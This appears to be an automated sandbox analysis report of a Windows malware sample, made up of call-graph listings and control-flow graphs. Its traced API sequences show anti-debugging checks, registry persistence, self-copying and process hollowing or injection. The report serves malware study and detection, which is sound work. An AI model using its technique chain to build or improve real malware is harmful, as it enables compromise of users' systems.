7ff72a0214ec LoadLibraryA GetProcAddress 992->1247 994 7ff72a02181c 1248 7ff72a0214ec LoadLibraryA GetProcAddress 994->1248 996 7ff72a021836 1249 7ff72a0214ec LoadLibraryA GetProcAddress 996->1249 998 7ff72a021850 1250 7ff72a0214ec LoadLibraryA GetProcAddress 998->1250 1000 7ff72a02186a 1251 7ff72a0214ec LoadLibraryA GetProcAddress 1000->1251 1002 7ff72a021884 1252 7ff72a0214ec LoadLibraryA GetProcAddress 1002->1252 1004 7ff72a02189e 1253 7ff72a0214ec LoadLibraryA GetProcAddress 1004->1253 1006 7ff72a0218b8 1254 7ff72a0214ec LoadLibraryA GetProcAddress 1006->1254 1008 7ff72a0218d2 1255 7ff72a0214ec LoadLibraryA GetProcAddress 1008->1255 1010 7ff72a0218ec 1256 7ff72a0214ec LoadLibraryA GetProcAddress 1010->1256 1012 7ff72a021906 1257 7ff72a0214ec LoadLibraryA GetProcAddress 1012->1257 1014 7ff72a021920 1258 7ff72a0214ec LoadLibraryA GetProcAddress 1014->1258 1016 7ff72a02193a 1259 7ff72a0214ec LoadLibraryA GetProcAddress 1016->1259 1018 7ff72a021954 1260 7ff72a0214ec LoadLibraryA GetProcAddress 1018->1260 1020 7ff72a02196e 1261 7ff72a0214ec LoadLibraryA GetProcAddress 1020->1261 1022 7ff72a021988 1262 7ff72a0214ec LoadLibraryA GetProcAddress 1022->1262 1024 7ff72a0219a2 1263 7ff72a0214ec LoadLibraryA GetProcAddress 1024->1263 1026 7ff72a0219bc 1264 7ff72a0214ec LoadLibraryA GetProcAddress 1026->1264 1028 7ff72a0219d6 1265 7ff72a0214ec LoadLibraryA GetProcAddress 1028->1265 1030 7ff72a0219f0 1266 7ff72a0214ec LoadLibraryA GetProcAddress 1030->1266 1032 7ff72a021a0a 1267 7ff72a0214ec LoadLibraryA GetProcAddress 1032->1267 1034 7ff72a021a24 1268 7ff72a0214ec LoadLibraryA GetProcAddress 1034->1268 1036 7ff72a021a3e 1269 7ff72a0214ec LoadLibraryA GetProcAddress 1036->1269 1038 7ff72a021a58 1270 7ff72a0214ec LoadLibraryA GetProcAddress 1038->1270 1040 7ff72a021a72 1271 7ff72a0214ec LoadLibraryA GetProcAddress 1040->1271 1042 7ff72a021a8c 1272 7ff72a0214ec LoadLibraryA GetProcAddress 1042->1272 1044 7ff72a021aa6 1273 7ff72a0214ec LoadLibraryA GetProcAddress 1044->1273 1046 7ff72a021ac0 1274 7ff72a0214ec LoadLibraryA GetProcAddress 1046->1274 1048 7ff72a021ada 1275 7ff72a0214ec LoadLibraryA GetProcAddress 1048->1275 1050 7ff72a021af4 1276 7ff72a0214ec LoadLibraryA GetProcAddress 1050->1276 1052 7ff72a021b0e 1277 7ff72a0214ec LoadLibraryA GetProcAddress 1052->1277 1054 7ff72a021b28 1278 7ff72a0214ec LoadLibraryA GetProcAddress 1054->1278 1056 7ff72a021b42 1279 7ff72a0214ec LoadLibraryA GetProcAddress 1056->1279 1058 7ff72a021b5c 1280 7ff72a0214ec LoadLibraryA GetProcAddress 1058->1280 1060 7ff72a021b76 1281 7ff72a0214ec LoadLibraryA GetProcAddress 1060->1281 1062 7ff72a021b90 1282 7ff72a0214ec LoadLibraryA GetProcAddress 1062->1282 1064 7ff72a021baa 1283 7ff72a0214ec LoadLibraryA GetProcAddress 1064->1283 1066 7ff72a021bc4 1284 7ff72a0214ec LoadLibraryA GetProcAddress 1066->1284 1068 7ff72a021bde 1285 7ff72a0214ec LoadLibraryA GetProcAddress 1068->1285 1070 7ff72a021bf8 1286 7ff72a0214ec LoadLibraryA GetProcAddress 1070->1286 1072 7ff72a021c12 1287 7ff72a0214ec LoadLibraryA GetProcAddress 1072->1287 1074 7ff72a021c2c 1288 7ff72a0214ec LoadLibraryA GetProcAddress 1074->1288 1076 7ff72a021c46 1289 7ff72a0214ec LoadLibraryA GetProcAddress 1076->1289 1078 7ff72a021c60 1290 7ff72a0214ec LoadLibraryA GetProcAddress 1078->1290 1080 7ff72a021c7a 1291 7ff72a0214ec LoadLibraryA GetProcAddress 1080->1291 1082 7ff72a021c94 1292 7ff72a0214ec LoadLibraryA GetProcAddress 1082->1292 1084 7ff72a021cae 1293 7ff72a0214ec LoadLibraryA GetProcAddress 1084->1293 1086 7ff72a021cc8 1294 7ff72a0214ec LoadLibraryA GetProcAddress 1086->1294 1088 7ff72a021ce2 1295 7ff72a0214ec LoadLibraryA GetProcAddress 1088->1295 1090 7ff72a021cfc 1296 7ff72a0214ec LoadLibraryA GetProcAddress 1090->1296 1092 7ff72a021d16 1297 7ff72a0214ec LoadLibraryA GetProcAddress 1092->1297 1094 7ff72a021d30 1298 7ff72a0214ec LoadLibraryA GetProcAddress 1094->1298 1096 7ff72a021d4a 1299 7ff72a0214ec LoadLibraryA GetProcAddress 1096->1299 1098 7ff72a021d64 1300 7ff72a0214ec LoadLibraryA GetProcAddress 1098->1300 1100 7ff72a021d7e 1301 7ff72a0214ec LoadLibraryA GetProcAddress 1100->1301 1102 7ff72a021d98 1302 7ff72a0214ec LoadLibraryA GetProcAddress 1102->1302 1104 7ff72a021db2 1303 7ff72a0214ec LoadLibraryA GetProcAddress 1104->1303 1106 7ff72a021dcc 1304 7ff72a0214ec LoadLibraryA GetProcAddress 1106->1304 1108 7ff72a021de6 1305 7ff72a0214ec LoadLibraryA GetProcAddress 1108->1305 1110 7ff72a021e00 1306 7ff72a0214ec LoadLibraryA GetProcAddress 1110->1306 1112 7ff72a021e1a 1307 7ff72a0214ec LoadLibraryA GetProcAddress 1112->1307 1114 7ff72a021e34 1308 7ff72a0214ec LoadLibraryA GetProcAddress 1114->1308 1116 7ff72a021e4e 1309 7ff72a0214ec LoadLibraryA GetProcAddress 1116->1309 1118 7ff72a021e68 1310 7ff72a0214ec LoadLibraryA GetProcAddress 1118->1310 1120 7ff72a021e82 1311 7ff72a0214ec LoadLibraryA GetProcAddress 1120->1311 1122 7ff72a021e9c 1312 7ff72a0214ec LoadLibraryA GetProcAddress 1122->1312 1124 7ff72a021eb6 1313 7ff72a0214ec LoadLibraryA GetProcAddress 1124->1313 1126 7ff72a021ed0 1314 7ff72a0214ec LoadLibraryA GetProcAddress 1126->1314 1128 7ff72a021eea 1315 7ff72a0214ec LoadLibraryA GetProcAddress 1128->1315 1130 7ff72a021f04 1316 7ff72a0214ec LoadLibraryA GetProcAddress 1130->1316 1132 7ff72a021f1e 1317 7ff72a0214ec LoadLibraryA GetProcAddress 1132->1317 1134 7ff72a021f38 1318 7ff72a0214ec LoadLibraryA GetProcAddress 1134->1318 1136 7ff72a021f52 1319 7ff72a0214ec LoadLibraryA GetProcAddress 1136->1319 1138 7ff72a021f6c 1320 7ff72a0214ec LoadLibraryA GetProcAddress 1138->1320 1140 7ff72a021f86 1321 7ff72a0214ec LoadLibraryA GetProcAddress 1140->1321 1142 7ff72a021fa0 1322 7ff72a0214ec LoadLibraryA GetProcAddress 1142->1322 1144 7ff72a021fba 1323 7ff72a02149c LoadLibraryA GetProcAddress 1144->1323 1146 7ff72a021fd4 1324 7ff72a0214ec LoadLibraryA GetProcAddress 1146->1324 1148 7ff72a021fee 1325 7ff72a0214ec LoadLibraryA GetProcAddress 1148->1325 1150 7ff72a022008 1326 7ff72a0214ec LoadLibraryA GetProcAddress 1150->1326 1152 7ff72a022022 1327 7ff72a0214ec LoadLibraryA GetProcAddress 1152->1327 1154 7ff72a02203c 1328 7ff72a0214ec LoadLibraryA GetProcAddress 1154->1328 1156 7ff72a022056 1329 7ff72a0214ec LoadLibraryA GetProcAddress 1156->1329 1158 7ff72a022070 1330 7ff72a0214ec LoadLibraryA GetProcAddress 1158->1330 1160 7ff72a02208a 1331 7ff72a02149c LoadLibraryA GetProcAddress 1160->1331 1162 7ff72a0220a4 1332 7ff72a02149c LoadLibraryA GetProcAddress 1162->1332 1164 7ff72a0220be 1333 7ff72a0214ec LoadLibraryA GetProcAddress 1164->1333 1166 7ff72a0220d8 1334 7ff72a0214ec LoadLibraryA GetProcAddress 1166->1334 1168 7ff72a0220f2 1335 7ff72a0214ec LoadLibraryA GetProcAddress 1168->1335 1170 7ff72a02210c 1336 7ff72a0214ec LoadLibraryA GetProcAddress 1170->1336 1172 7ff72a022126 1337 7ff72a0214ec LoadLibraryA GetProcAddress 1172->1337 1174 7ff72a022140 1338 7ff72a0214ec LoadLibraryA GetProcAddress 1174->1338 1176 7ff72a02215a 1177 7ff72a0231b4 IsDebuggerPresent 1176->1177 1178 7ff72a0231c6 GetCurrentProcess CheckRemoteDebuggerPresent 1177->1178 1179 7ff72a0231c2 1177->1179 1178->1179 1179->890 1179->891 1181 7ff72a0240d2 GetTokenInformation 1180->1181 1182 7ff72a023439 1180->1182 1339 7ff72a023b1c VirtualAlloc 1181->1339 1191 7ff72a023cac GetModuleFileNameW 1182->1191 1184 7ff72a024103 GetTokenInformation 1185 7ff72a02414a AdjustTokenPrivileges CloseHandle 1184->1185 1186 7ff72a024130 CloseHandle 1184->1186 1340 7ff72a023aec 1185->1340 1187 7ff72a023aec VirtualFree 1186->1187 1188 7ff72a024145 1187->1188 1188->1182 1192 7ff72a023cd7 PathFindFileNameW wcslen 1191->1192 1193 7ff72a023d9a wcsncpy 1191->1193 1194 7ff72a023d11 1192->1194 1193->1194 1194->895 1196 7ff72a024218 GetLastError 1195->1196 1197 7ff72a023525 1195->1197 1196->1197 1198 7ff72a024225 CloseHandle 1196->1198 1197->924 1197->925 1198->1197 1343 7ff72a02388c 1199->1343 1201 7ff72a023224 1346 7ff72a0242fc CreateFileW 1201->1346 1205 7ff72a02370c 3 API calls 1204->1205 1206 7ff72a023a67 1205->1206 1207 7ff72a02388c 11 API calls 1206->1207 1208 7ff72a023a71 GetModuleFileNameW DeleteFileW CopyFileW 1207->1208 1209 7ff72a02355f 1208->1209 1210 7ff72a023ab3 SetFileAttributesW 1208->1210 1213 7ff72a0233a4 GetVersionExW 1209->1213 1363 7ff72a02397c RegOpenKeyExW 1210->1363 1214 7ff72a0233d5 1213->1214 1214->930 1214->931 1216 7ff72a02388c 11 API calls 1215->1216 1217 7ff72a0232b5 1216->1217 1366 7ff72a02452c CreateFileW 1217->1366 1219 7ff72a02330f CreateThread 1219->917 1220 7ff72a0232cd 1220->1219 1378 7ff72a02408c 1220->1378 1224->948 1225->950 1226->952 1227->954 1228->956 1229->958 1230->960 1231->962 1232->964 1233->966 1234->968 1235->970 1236->972 1237->974 1238->976 1239->978 1240->980 1241->982 1242->984 1243->986 1244->988 1245->990 1246->992 1247->994 1248->996 1249->998 1250->1000 1251->1002 1252->1004 1253->1006 1254->1008 1255->1010 1256->1012 1257->1014 1258->1016 1259->1018 1260->1020 1261->1022 1262->1024 1263->1026 1264->1028 1265->1030 1266->1032 1267->1034 1268->1036 1269->1038 1270->1040 1271->1042 1272->1044 1273->1046 1274->1048 1275->1050 1276->1052 1277->1054 1278->1056 1279->1058 1280->1060 1281->1062 1282->1064 1283->1066 1284->1068 1285->1070 1286->1072 1287->1074 1288->1076 1289->1078 1290->1080 1291->1082 1292->1084 1293->1086 1294->1088 1295->1090 1296->1092 1297->1094 1298->1096 1299->1098 1300->1100 1301->1102 1302->1104 1303->1106 1304->1108 1305->1110 1306->1112 1307->1114 1308->1116 1309->1118 1310->1120 1311->1122 1312->1124 1313->1126 1314->1128 1315->1130 1316->1132 1317->1134 1318->1136 1319->1138 1320->1140 1321->1142 1322->1144 1323->1146 1324->1148 1325->1150 1326->1152 1327->1154 1328->1156 1329->1158 1330->1160 1331->1162 1332->1164 1333->1166 1334->1168 1335->1170 1336->1172 1337->1174 1338->1176 1339->1184 1341 7ff72a023afd VirtualFree 1340->1341 1342 7ff72a023b10 1340->1342 1341->1342 1342->1182 1352 7ff72a02370c GetWindowsDirectoryW 1343->1352 1345 7ff72a0238bb 8 API calls 1345->1201 1347 7ff72a024352 1346->1347 1348 7ff72a024373 GetLastError 1346->1348 1357 7ff72a02424c GetFileSize 1347->1357 1349 7ff72a023237 CreateThread Sleep CreateThread 1348->1349 1349->932 1353 7ff72a023760 GetVolumeInformationW 1352->1353 1354 7ff72a023756 1352->1354 1355 7ff72a0237dc 1353->1355 1354->1353 1356 7ff72a023846 wsprintfW 1355->1356 1356->1345 1362 7ff72a023b1c VirtualAlloc 1357->1362 1359 7ff72a024278 1360 7ff72a02428c SetFilePointer ReadFile 1359->1360 1361 7ff72a0242c2 CloseHandle 1359->1361 1360->1361 1361->1349 1362->1359 1364 7ff72a0239bd 1363->1364 1365 7ff72a0239c1 RegSetValueExW RegCloseKey 1363->1365 1364->1209 1365->1364 1367 7ff72a02458d GetFileSize GetProcessHeap RtlAllocateHeap 1366->1367 1368 7ff72a024586 1366->1368 1369 7ff72a0245e8 ReadFile 1367->1369 1370 7ff72a0245d6 CloseHandle 1367->1370 1368->1220 1371 7ff72a024637 1369->1371 1372 7ff72a02460f GetProcessHeap HeapFree CloseHandle 1369->1372 1370->1368 1373 7ff72a024650 GetProcessHeap HeapFree CloseHandle 1371->1373 1375 7ff72a024678 1371->1375 1372->1368 1373->1368 1374 7ff72a0247e3 GetProcessHeap HeapFree CloseHandle 1374->1368 1375->1374 1376 7ff72a024733 GetProcessHeap RtlAllocateHeap 1375->1376 1377 7ff72a02477c 1376->1377 1377->1374 1397 7ff72a023fcc CreateToolhelp32Snapshot 1378->1397 1381 7ff72a0210d8 OpenProcess 1382 7ff72a02111f 1381->1382 1384 7ff72a021115 1381->1384 1404 7ff72a0213c4 GetModuleHandleA GetProcAddress 1382->1404 1384->1219 1385 7ff72a02112c 1385->1384 1386 7ff72a0211fe VirtualAllocEx 1385->1386 1386->1384 1387 7ff72a02124f WriteProcessMemory 1386->1387 1387->1384 1388 7ff72a021286 WriteProcessMemory 1387->1388 1388->1384 1389 7ff72a0212d1 1388->1389 1406 7ff72a021444 GetSystemInfo 1389->1406 1392 7ff72a0212fe GetModuleHandleA GetProcAddress 1392->1384 1393 7ff72a021338 1392->1393 1393->1384 1396 7ff72a021399 CloseHandle 1393->1396 1394 7ff72a021444 GetSystemInfo 1395 7ff72a0212f4 1394->1395 1395->1392 1395->1396 1396->1384 1398 7ff72a024007 Process32FirstW 1397->1398 1399 7ff72a0232fa 1397->1399 1400 7ff72a024061 CloseHandle 1398->1400 1401 7ff72a024026 wcscmp 1398->1401 1399->1381 1400->1399 1402 7ff72a02404a Process32NextW 1401->1402 1403 7ff72a02403d 1401->1403 1402->1400 1402->1401 1403->1400 1405 7ff72a0213ff 1404->1405 1405->1385 1407 7ff72a0212ea 1406->1407 1407->1392 1407->1394 1411 7ff72a022f34 1412 7ff72a02388c 11 API calls 1411->1412 1413 7ff72a022f73 1412->1413 1414 7ff72a02452c 17 API calls 1413->1414 1415 7ff72a022f97 1414->1415 1416 7ff72a02408c 5 API calls 1415->1416 1417 7ff72a022fba 1416->1417 1418 7ff72a0210d8 10 API calls 1417->1418 1419 7ff72a022fcf GetProcessHeap HeapFree 1418->1419 1420 7ff72a022ea4 CreateMutexA 1421 7ff72a022ec9 ReleaseMutex CloseHandle 1420->1421 1422 7ff72a022ee6 GetLastError 1420->1422 1423 7ff72a022f28 1421->1423 1424 7ff72a022f10 ReleaseMutex CloseHandle 1422->1424 1425 7ff72a022ef3 ReleaseMutex CloseHandle 1422->1425 1424->1423 1425->1423 1443 7ff72a023074 1448 7ff72a02307d 1443->1448 1444 7ff72a023169 1447 7ff72a023bec RegDeleteKeyW 1447->1448 1448->1444 1448->1447 1449 7ff72a023dec 9 API calls 1448->1449 1450 7ff72a02397c 3 API calls 1448->1450 1452 7ff72a02440c CreateFileW 1448->1452 1457 7ff72a023b4c RegOpenKeyExW 1448->1457 1449->1448 1451 7ff72a023159 Sleep 1450->1451 1451->1448 1453 7ff72a024467 1452->1453 1454 7ff72a0244a2 1452->1454 1460 7ff72a02438c SetFilePointer WriteFile SetEndOfFile 1453->1460 1454->1448 1456 7ff72a024483 SetFileAttributesW CloseHandle 1456->1454 1458 7ff72a023bda 1457->1458 1459 7ff72a023ba0 RegSetValueExW RegCloseKey 1457->1459 1458->1448 1459->1458 1460->1456 1463 7ff72a023184 1464 7ff72a02318d 1463->1464 1465 7ff72a0231a6 1464->1465 1468 7ff72a023004 1464->1468 1473 7ff72a022e04 CreateMutexA 1468->1473 1471 7ff72a02301f Sleep CreateThread WaitForSingleObject 1472 7ff72a023064 Sleep 1471->1472 1472->1464 1474 7ff72a022e4d GetLastError 1473->1474 1475 7ff72a022e30 ReleaseMutex CloseHandle 1473->1475 1477 7ff72a022e77 ReleaseMutex CloseHandle 1474->1477 1478 7ff72a022e5a ReleaseMutex CloseHandle 1474->1478 1476 7ff72a022e8f 1475->1476 1476->1471 1476->1472 1477->1476 1478->1476

                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                  callgraph 0 Function_00007FF72A023C2C 1 Function_00007FF72A02452C 71 Function_00007FF72A0244BC 1->71 2 Function_00007FF72A022F34 2->0 2->1 37 Function_00007FF72A02388C 2->37 39 Function_00007FF72A02408C 2->39 85 Function_00007FF72A0210D8 2->85 3 Function_00007FF72A023B1C 4 Function_00007FF72A02EC20 5 Function_00007FF72A02F749 6 Function_00007FF72A02F747 7 Function_00007FF72A02B248 8 Function_00007FF72A02424C 8->3 9 Function_00007FF72A023B4C 10 Function_00007FF72A02B04E 11 Function_00007FF72A02F74B 12 Function_00007FF72A02B052 13 Function_00007FF72A02B152 14 Function_00007FF72A02C14F 15 Function_00007FF72A022454 16 Function_00007FF72A023555 17 Function_00007FF72A02DC37 18 Function_00007FF72A023A3C 18->37 44 Function_00007FF72A02397C 18->44 96 Function_00007FF72A02370C 18->96 19 Function_00007FF72A02153C 57 Function_00007FF72A02149C 19->57 79 Function_00007FF72A0214EC 19->79 20 Function_00007FF72A023344 69 Function_00007FF72A0224D4 20->69 21 Function_00007FF72A021444 22 Function_00007FF72A022168 23 Function_00007FF72A02E668 24 Function_00007FF72A02EC71 25 Function_00007FF72A02B772 26 Function_00007FF72A02EA72 27 Function_00007FF72A02B26F 28 Function_00007FF72A023074 28->9 28->44 81 Function_00007FF72A023BEC 28->81 82 Function_00007FF72A023DEC 28->82 97 Function_00007FF72A02440C 28->97 29 Function_00007FF72A02B776 30 Function_00007FF72A02B05A 31 Function_00007FF72A02D65A 32 Function_00007FF72A02FE5A 33 Function_00007FF72A02B061 34 Function_00007FF72A023364 34->69 35 Function_00007FF72A021088 36 Function_00007FF72A02E289 37->96 38 Function_00007FF72A02438C 67 Function_00007FF72A023FCC 39->67 40 Function_00007FF72A022494 41 Function_00007FF72A02DA94 42 Function_00007FF72A02E079 43 Function_00007FF72A02B778 45 Function_00007FF72A02147F 46 Function_00007FF72A02E07F 47 Function_00007FF72A023384 47->69 48 Function_00007FF72A023184 108 Function_00007FF72A023004 48->108 49 Function_00007FF72A02FEA9 50 Function_00007FF72A0240AC 50->3 78 Function_00007FF72A023AEC 50->78 51 Function_00007FF72A023CAC 52 Function_00007FF72A02E4AB 53 Function_00007FF72A0300B0 54 Function_00007FF72A0231B4 55 Function_00007FF72A0236B4 56 Function_00007FF72A02E6B4 58 Function_00007FF72A02CE9D 59 Function_00007FF72A02E0A1 60 Function_00007FF72A0301A2 61 Function_00007FF72A0233A4 62 Function_00007FF72A0232A4 62->0 62->1 62->37 62->39 62->85 63 Function_00007FF72A022EA4 64 Function_00007FF72A02E0A5 65 Function_00007FF72A0236A6 66 Function_00007FF72A02F6A3 68 Function_00007FF72A02E6CD 69->15 69->40 100 Function_00007FF72A022414 69->100 70 Function_00007FF72A02EDB8 72 Function_00007FF72A0235C1 73 Function_00007FF72A02B2C0 74 Function_00007FF72A0213C4 75 Function_00007FF72A0236C4 76 Function_00007FF72A02E6C5 77 Function_00007FF72A02D2E7 80 Function_00007FF72A0241EC 83 Function_00007FF72A02BBF2 84 Function_00007FF72A02E9F6 85->21 85->74 107 Function_00007FF72A021000 85->107 86 Function_00007FF72A0301DA 87 Function_00007FF72A02B0D8 88 Function_00007FF72A023EDC 89 Function_00007FF72A0236DC 90 Function_00007FF72A02CCE1 91 Function_00007FF72A02D2E5 92 Function_00007FF72A02F7E6 93 Function_00007FF72A02D2E3 94 Function_00007FF72A02C2E4 95 Function_00007FF72A02EC09 96->89 97->38 98 Function_00007FF72A02D70B 99 Function_00007FF72A023414 99->18 99->19 99->50 99->51 99->54 99->61 99->62 99->80 99->88 101 Function_00007FF72A023214 99->101 101->37 105 Function_00007FF72A0242FC 101->105 102 Function_00007FF72A02BBF9 103 Function_00007FF72A02BBF7 104 Function_00007FF72A02C4F8 105->8 106 Function_00007FF72A02BBFB 109 Function_00007FF72A022E04 108->109 110 Function_00007FF72A02EA05 111 Function_00007FF72A02DE04

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FF72A0224D4 Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 231 7ff72a0224d4-7ff72a02254e GetModuleFileNameW 232 7ff72a022550 231->232 233 7ff72a022555-7ff72a022591 231->233 234 7ff72a022df9-7ff72a022e01 232->234 235 7ff72a0225a9-7ff72a0225c5 call 7ff72a022414 233->235 236 7ff72a022593-7ff72a02259b 233->236 244 7ff72a022608-7ff72a022612 235->244 237 7ff72a0225c7-7ff72a0225e3 call 7ff72a022454 236->237 238 7ff72a02259d-7ff72a0225a5 236->238 237->244 241 7ff72a0225a7-7ff72a022603 238->241 242 7ff72a0225e5-7ff72a022601 call 7ff72a022494 238->242 241->234 242->244 249 7ff72a022619-7ff72a02266d CreateProcessW 244->249 250 7ff72a022614 244->250 251 7ff72a02266f 249->251 252 7ff72a022674-7ff72a0226b4 CreateFileW 249->252 250->234 251->234 253 7ff72a0226bb-7ff72a0226d7 GetFileSize 252->253 254 7ff72a0226b6 252->254 255 7ff72a0226d9-7ff72a0226e1 253->255 256 7ff72a0226e3-7ff72a0226ee CloseHandle 253->256 254->234 255->256 257 7ff72a0226f3-7ff72a02271b VirtualAlloc 255->257 256->234 258 7ff72a02272d-7ff72a022758 ReadFile 257->258 259 7ff72a02271d-7ff72a022728 CloseHandle 257->259 260 7ff72a02275a-7ff72a022778 VirtualFree CloseHandle 258->260 261 7ff72a02277d-7ff72a0227cb CloseHandle GetThreadContext 258->261 259->234 260->234 262 7ff72a0227cd-7ff72a0227e0 VirtualFree 261->262 263 7ff72a0227e5-7ff72a02286a ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->263 262->234 264 7ff72a02286c-7ff72a02287f VirtualFree 263->264 265 7ff72a022884-7ff72a0228ed VirtualAllocEx 263->265 264->234 266 7ff72a022907-7ff72a02293b WriteProcessMemory 265->266 267 7ff72a0228ef-7ff72a022902 VirtualFree 265->267 268 7ff72a02293d-7ff72a022950 VirtualFree 266->268 269 7ff72a022955-7ff72a022960 266->269 267->234 268->234 270 7ff72a022972-7ff72a022985 269->270 271 7ff72a02298b-7ff72a022a14 WriteProcessMemory 270->271 272 7ff72a022a33-7ff72a022a7a 270->272 273 7ff72a022a2e 271->273 274 7ff72a022a16-7ff72a022a29 VirtualFree 271->274 275 7ff72a022a8c-7ff72a022a9f 272->275 273->270 274->234 277 7ff72a022d24-7ff72a022da8 WriteProcessMemory SetThreadContext 275->277 278 7ff72a022aa5-7ff72a022af4 RtlCompareMemory 275->278 279 7ff72a022daa-7ff72a022dbd VirtualFree 277->279 280 7ff72a022dbf-7ff72a022dcf ResumeThread 277->280 281 7ff72a022af8-7ff72a022b21 278->281 282 7ff72a022af6 278->282 279->234 284 7ff72a022dd1-7ff72a022de4 VirtualFree 280->284 285 7ff72a022de6-7ff72a022df3 VirtualFree 280->285 286 7ff72a022b2c-7ff72a022b3a 281->286 282->275 284->234 285->234 287 7ff72a022b40-7ff72a022bcb 286->287 288 7ff72a022d1f 286->288 289 7ff72a022bdd-7ff72a022beb 287->289 288->277 290 7ff72a022d1a 289->290 291 7ff72a022bf1-7ff72a022c24 289->291 290->286 292 7ff72a022c28-7ff72a022cfb ReadProcessMemory WriteProcessMemory 291->292 293 7ff72a022c26 291->293 295 7ff72a022cfd-7ff72a022d10 VirtualFree 292->295 296 7ff72a022d15 292->296 293->289 295->234 296->290
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                  • Opcode ID: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction ID: bcdfc298dee747aff4ca655883c8a30bad4519a57e611c3440695130130139e7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B532E836608BC686E774DB56E8547AAF7A1FB88744F404136DA8E83B58EF3CD4448F14
                                                                                                                                                                                                                                  Function 00007FF72A023414 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 297 7ff72a023414-7ff72a02342a call 7ff72a02153c call 7ff72a0231b4 302 7ff72a02342c-7ff72a02342e ExitProcess 297->302 303 7ff72a023434-7ff72a023462 call 7ff72a0240ac call 7ff72a023cac call 7ff72a023edc 297->303 310 7ff72a023464-7ff72a023475 call 7ff72a0241ec 303->310 311 7ff72a0234b3-7ff72a0234c6 call 7ff72a023edc 303->311 318 7ff72a023477-7ff72a023488 call 7ff72a0241ec 310->318 319 7ff72a02348a-7ff72a02348c ExitProcess 310->319 316 7ff72a0234c8-7ff72a0234d9 call 7ff72a0241ec 311->316 317 7ff72a023504-7ff72a023517 call 7ff72a023edc 311->317 328 7ff72a0234db-7ff72a0234dd ExitProcess 316->328 329 7ff72a0234e3 call 7ff72a023214 316->329 326 7ff72a02355a-7ff72a023570 call 7ff72a023a3c call 7ff72a0233a4 317->326 327 7ff72a023519-7ff72a02352a call 7ff72a0241ec 317->327 318->319 330 7ff72a023492 call 7ff72a0232a4 318->330 348 7ff72a023572-7ff72a023583 call 7ff72a0241ec 326->348 349 7ff72a0235c6-7ff72a02369e CreateThread * 3 WaitForMultipleObjects ExitProcess 326->349 342 7ff72a02352c-7ff72a02352e ExitProcess 327->342 343 7ff72a023534 call 7ff72a023214 327->343 337 7ff72a0234e8-7ff72a0234ed 329->337 335 7ff72a023497-7ff72a02349c 330->335 340 7ff72a0234ab-7ff72a0234ad ExitProcess 335->340 341 7ff72a02349e-7ff72a0234a9 Sleep 335->341 344 7ff72a0234fc-7ff72a0234fe ExitProcess 337->344 345 7ff72a0234ef-7ff72a0234fa Sleep 337->345 341->335 350 7ff72a023539-7ff72a02353e 343->350 345->337 355 7ff72a023598-7ff72a02359a ExitProcess 348->355 356 7ff72a023585-7ff72a023596 call 7ff72a0241ec 348->356 352 7ff72a02354d-7ff72a02354f ExitProcess 350->352 353 7ff72a023540-7ff72a02354b Sleep 350->353 353->350 356->355 359 7ff72a0235a0 call 7ff72a0232a4 356->359 361 7ff72a0235a5-7ff72a0235aa 359->361 362 7ff72a0235b9-7ff72a0235bb ExitProcess 361->362 363 7ff72a0235ac-7ff72a0235b7 Sleep 361->363 363->361
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
